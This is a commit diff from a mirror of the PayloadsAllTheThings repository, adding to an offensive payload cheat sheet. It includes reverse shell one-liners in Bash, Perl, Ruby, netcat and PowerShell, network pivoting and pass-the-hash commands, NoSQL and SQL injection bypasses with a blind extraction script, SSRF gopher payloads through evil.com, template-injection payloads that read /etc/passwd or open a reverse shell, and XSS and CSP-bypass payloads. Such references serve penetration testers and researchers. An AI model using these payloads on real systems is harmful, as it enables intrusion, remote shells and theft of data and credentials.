mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Traversal Dir + NoSQL major updates + small addons
This commit is contained in:
parent
40fa20ec63
commit
b87c3fd7ff
@ -2,15 +2,32 @@
|
||||
|
||||
## Reverse Shell Cheat Sheet
|
||||
|
||||
Bash
|
||||
Bash TCP
|
||||
```bash
|
||||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
|
||||
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
|
||||
```
|
||||
|
||||
Bash UDP
|
||||
```
|
||||
Victim:
|
||||
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
|
||||
|
||||
Listener:
|
||||
nc -u -lvp 4242
|
||||
```
|
||||
|
||||
|
||||
Perl
|
||||
```perl
|
||||
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
|
||||
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
|
||||
|
||||
NOTE: Windows only
|
||||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
|
||||
Python
|
||||
@ -26,12 +43,21 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
Ruby
|
||||
```ruby
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
|
||||
NOTE: Windows only
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
|
||||
|
||||
Netcat
|
||||
Netcat Traditional
|
||||
```bash
|
||||
nc -e /bin/sh [IPADDR] [PORT]
|
||||
```
|
||||
|
||||
Netcat OpenBsd
|
||||
```bash
|
||||
nc -e /bin/sh 10.0.0.1 1234
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
```
|
||||
|
||||
@ -41,6 +67,11 @@ ncat 127.0.0.1 4444 -e /bin/bash
|
||||
ncat --udp 127.0.0.1 4444 -e /bin/bash
|
||||
```
|
||||
|
||||
Powershell
|
||||
```powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
Java
|
||||
```java
|
||||
r = Runtime.getRuntime()
|
||||
@ -64,7 +95,32 @@ NodeJS
|
||||
})();
|
||||
```
|
||||
|
||||
## Spawn TTY
|
||||
```
|
||||
/bin/sh -i
|
||||
```
|
||||
|
||||
(From an interpreter)
|
||||
```
|
||||
python -c 'import pty; pty.spawn("/bin/sh")'
|
||||
perl -e 'exec "/bin/sh";'
|
||||
perl: exec "/bin/sh";
|
||||
ruby: exec "/bin/sh"
|
||||
lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
(From within vi)
|
||||
```
|
||||
:!bash
|
||||
:set shell=/bin/bash:shell
|
||||
```
|
||||
|
||||
(From within nmap)
|
||||
```
|
||||
!sh
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
||||
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
|
||||
|
100
Methodology and Resources/Network Pivoting Techniques.md
Normal file
100
Methodology and Resources/Network Pivoting Techniques.md
Normal file
@ -0,0 +1,100 @@
|
||||
# Network Pivoting Techniques
|
||||
|
||||
## SSH
|
||||
|
||||
### SOCKS Proxy
|
||||
```
|
||||
ssh -D8080 [user]@[host]
|
||||
|
||||
ssh -N -f -D 9000 [user]@[host]
|
||||
-f : ssh in background
|
||||
-N : do not execute a remote command
|
||||
```
|
||||
|
||||
### Local Port Forwarding
|
||||
```
|
||||
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
|
||||
```
|
||||
|
||||
|
||||
### Remote Port Forwarding
|
||||
```
|
||||
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
|
||||
```
|
||||
|
||||
## Proxychains
|
||||
**Config file**: /etc/proxychains.conf
|
||||
```bash
|
||||
[ProxyList]
|
||||
socks4 localhost 8080
|
||||
```
|
||||
Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
|
||||
|
||||
## Web SOCKS - reGeorg
|
||||
```
|
||||
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
|
||||
```
|
||||
|
||||
## Rpivot
|
||||
|
||||
Server (Attacker box)
|
||||
```python
|
||||
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
|
||||
```
|
||||
|
||||
Client (Compromised box)
|
||||
```python
|
||||
python client.py --server-ip <ip> --server-port 9443
|
||||
```
|
||||
|
||||
Through corporate proxy
|
||||
```python
|
||||
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
|
||||
```
|
||||
|
||||
Passing the hash
|
||||
```python
|
||||
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
|
||||
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||
```
|
||||
|
||||
|
||||
## Basic Pivoting Types
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| Listen - Listen | Exposed asset, may not want to connect out. |
|
||||
| Listen - Connect | Normal redirect. |
|
||||
| Connect - Connect | Can’t bind, so connect to bridge two hosts |
|
||||
|
||||
|
||||
## Listen - Listen
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
|
||||
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
|
||||
| remote host 1 | `ncat localhost 8080 < file` |
|
||||
| remote host 2 | `ncat localhost 9090 > newfile` |
|
||||
|
||||
|
||||
## Listen - Connect
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
|
||||
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
|
||||
| remote host 1 | `ncat localhost -p 8080 < file` |
|
||||
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||
|
||||
|
||||
## Connect - Connect
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
|
||||
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
|
||||
| remote host 1 | `ncat -l -p 8080 < file |
|
||||
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
@ -47,6 +47,10 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||
```
|
||||
Note: you may need to enable it with the following command
|
||||
```
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
```
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
|
@ -3,9 +3,16 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic authentication bypass using not equal ($ne)
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
```
|
||||
in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
|
||||
in JSON
|
||||
{"username": {"$ne": null}, "password": {"$ne": null} }
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
||||
|
||||
```
|
||||
|
||||
Extract length information
|
||||
@ -16,12 +23,39 @@ username[$ne]=toto&password[$regex]=.{3}
|
||||
|
||||
Extract data information
|
||||
```
|
||||
in URL
|
||||
username[$ne]=toto&password[$regex]=m.{2}
|
||||
username[$ne]=toto&password[$regex]=md.{1}
|
||||
username[$ne]=toto&password[$regex]=mdp
|
||||
|
||||
username[$ne]=toto&password[$regex]=m.*
|
||||
username[$ne]=toto&password[$regex]=md.*
|
||||
|
||||
in JSON
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||
```
|
||||
|
||||
## Blind NoSQL
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username="admin"
|
||||
password=""
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|']:
|
||||
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||
r = requests.post(u, data = {'ids': payload}, verify = False)
|
||||
if 'OK' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
@ -47,6 +81,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
||||
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
||||
* https://github.com/cr0hn/nosqlinjection_wordlists
|
||||
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
||||
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
||||
* https://github.com/cr0hn/nosqlinjection_wordlists
|
||||
* https://zanon.io/posts/nosql-injection-in-mongodb
|
||||
|
@ -33,6 +33,12 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||
```
|
||||
|
||||
Shorter to read:
|
||||
```
|
||||
' and updatexml(null,concat(0x0a,version()),null)-- -
|
||||
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||
```
|
||||
|
||||
## MYSQL Error Based - Extractvalue function
|
||||
```
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
|
@ -35,6 +35,12 @@ Using this vulnerability users can upload images from any image URL = trigger an
|
||||
```
|
||||
|
||||
## Bypassing filters
|
||||
Bypass using HTTPS
|
||||
```
|
||||
https://127.0.0.1/
|
||||
https://localhost/
|
||||
```
|
||||
|
||||
Bypass localhost with [::]
|
||||
```
|
||||
http://[::]:80/
|
||||
@ -53,6 +59,7 @@ http://0000::1:3128/ Squid
|
||||
|
||||
Bypass localhost with a domain redirecting to locahost
|
||||
```
|
||||
http://localtest.me
|
||||
http://n-pn.info
|
||||
```
|
||||
|
||||
@ -144,6 +151,37 @@ You didn't say the magic word !
|
||||
QUIT
|
||||
```
|
||||
|
||||
Gopher:// SMTP - Back connect to 1337
|
||||
```php
|
||||
Content of evil.com/redirect.php:
|
||||
<?php
|
||||
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
|
||||
?>
|
||||
|
||||
Now query it.
|
||||
https://example.com/?q=http://evil.com/redirect.php.
|
||||
```
|
||||
Gopher:// SMTP - send a mail
|
||||
```php
|
||||
Content of evil.com/redirect.php:
|
||||
<?php
|
||||
$commands = array(
|
||||
'HELO victim.com',
|
||||
'MAIL FROM: <admin@victim.com>',
|
||||
'RCPT To: <sxcurity@oou.us>',
|
||||
'DATA',
|
||||
'Subject: @sxcurity!',
|
||||
'Corben was here, woot woot!',
|
||||
'.'
|
||||
);
|
||||
|
||||
$payload = implode('%0A', $commands);
|
||||
|
||||
header('Location: gopher://0:25/_'.$payload);
|
||||
?>
|
||||
```
|
||||
|
||||
|
||||
## SSRF on AWS Bucket
|
||||
Interesting path to look for at http://169.254.169.254
|
||||
```
|
||||
@ -191,3 +229,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
||||
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
||||
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
|
||||
|
@ -2,19 +2,47 @@
|
||||
|
||||
Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
|
||||
## Ruby
|
||||
#### Basic injection
|
||||
```python
|
||||
<%= 7 * 7 %>
|
||||
```
|
||||
|
||||
#### Retrieve /etc/passwd
|
||||
```python
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
```
|
||||
|
||||
|
||||
## Java
|
||||
#### Basic injection
|
||||
```java
|
||||
${{7*7}}
|
||||
```
|
||||
|
||||
#### Retrieve the system’s environment variables.
|
||||
```java
|
||||
${T(java.lang.System).getenv()}
|
||||
```
|
||||
|
||||
#### Retrieve /etc/passwd
|
||||
```java
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
|
||||
## Jinja2
|
||||
[Official website](http://jinja.pocoo.org/)
|
||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||
|
||||
Basic injection
|
||||
```
|
||||
#### Basic injection
|
||||
```python
|
||||
{{4*4}}[[5*5]]
|
||||
```
|
||||
|
||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||
The above injections have been tested on Flask application.
|
||||
#### Template format
|
||||
```
|
||||
```python
|
||||
{% extends "layout.html" %}
|
||||
{% block body %}
|
||||
<ul>
|
||||
@ -27,7 +55,7 @@ The above injections have been tested on Flask application.
|
||||
```
|
||||
|
||||
#### Dump all used classes
|
||||
```
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
```
|
||||
|
||||
@ -40,7 +68,7 @@ The above injections have been tested on Flask application.
|
||||
```
|
||||
|
||||
#### Read remote file
|
||||
```
|
||||
```python
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
```
|
||||
@ -62,8 +90,9 @@ Inject this template
|
||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
#### Ressources & Sources
|
||||
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
|
||||
## Thanks to
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
#### Training
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
|
@ -1,8 +1,8 @@
|
||||
# Traversal Directory
|
||||
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic
|
||||
```
|
||||
../
|
||||
..\
|
||||
@ -16,5 +16,28 @@ A directory traversal consists in exploiting insufficient security validation /
|
||||
...\.\
|
||||
```
|
||||
|
||||
16 bit Unicode encoding
|
||||
```
|
||||
. = %u002e
|
||||
/ = %u2215
|
||||
\ = %u2216
|
||||
```
|
||||
|
||||
Double URL encoding
|
||||
```
|
||||
. = %252e
|
||||
/ = %252f
|
||||
\ = %255c
|
||||
```
|
||||
|
||||
UTF-8 Unicode encoding
|
||||
```
|
||||
. = %c0%2e, %e0%40%ae, %c0ae
|
||||
/ = %c0%af, %e0%80%af, %c0%2f
|
||||
\ = %c0%5c, %c0%80%5c
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Thanks to
|
||||
*
|
||||
* https://twitter.com/huykha10/status/962419695470174208
|
||||
|
@ -100,6 +100,7 @@ io.swf?yid=\"));}catch(e){alert(1);}//
|
||||
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
|
||||
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
|
||||
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
||||
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
|
||||
```
|
||||
|
||||
XSS in Hidden input
|
||||
@ -113,6 +114,20 @@ DOM XSS
|
||||
#"><img src=/ onerror=alert(2)>
|
||||
```
|
||||
|
||||
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
||||
```
|
||||
-(confirm)(document.domain)//
|
||||
; alert(1);//
|
||||
```
|
||||
|
||||
XSS URL
|
||||
```
|
||||
URL/<svg onload=alert(1)>
|
||||
URL/<script>alert('XSS');//
|
||||
URL/<input autofocus onfocus=alert(1)>
|
||||
```
|
||||
|
||||
|
||||
## XSS in wrappers javascript and data URI
|
||||
XSS with javascript:
|
||||
```
|
||||
@ -609,6 +624,11 @@ Little Endian : 0xFF 0xFE 0x00 0x00
|
||||
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||||
```
|
||||
|
||||
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
||||
//google.com/complete/search?client=chrome&jsonp=alert(1);
|
||||
```
|
||||
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
|
||||
```
|
||||
|
||||
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
||||
```javascript
|
||||
@ -619,9 +639,6 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
|
||||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Exotic payloads
|
||||
```
|
||||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||||
@ -638,6 +655,18 @@ Exotic payloads
|
||||
```
|
||||
|
||||
|
||||
## More fun ?
|
||||
This section will be used for the "fun/interesting/useless" stuff.
|
||||
|
||||
Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
|
||||
Note : it requires user permission
|
||||
```
|
||||
Notification.requestPermission(x=>{new(Notification)(1)})
|
||||
|
||||
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||||
* tbm
|
||||
|
Loading…
Reference in New Issue
Block a user